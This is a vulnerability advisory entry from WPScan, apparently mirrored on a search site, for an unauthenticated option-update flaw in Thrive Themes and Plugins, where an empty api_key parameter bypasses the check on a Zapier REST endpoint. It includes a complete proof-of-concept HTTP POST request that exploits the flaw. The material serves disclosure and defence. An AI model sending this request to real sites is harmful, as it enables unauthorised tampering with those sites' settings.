Lucene search

K
wpvulndbChloe Chamberland, Ram Gall, Charles SweethillWPVDB-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900
HistoryMar 24, 2021 - 12:00 a.m.

All Thrive Themes and Plugins - Unauthenticated Option Update

2021-03-2400:00:00
Chloe Chamberland, Ram Gall, Charles Sweethill
wpscan.com
13

0.001 Low

EPSS

Percentile

38.8%

The plugins and themes register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

PoC

POST /wp-json/td/v1/optin/subscription HTTP/1.1 Host: [URL] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 54 hook_url={“http://key”:“maliciousfile.php”}&api;_key=

0.001 Low

EPSS

Percentile

38.8%

Related for WPVDB-ID:35ACD2D8-85FC-4AF5-8F6C-224FA7D92900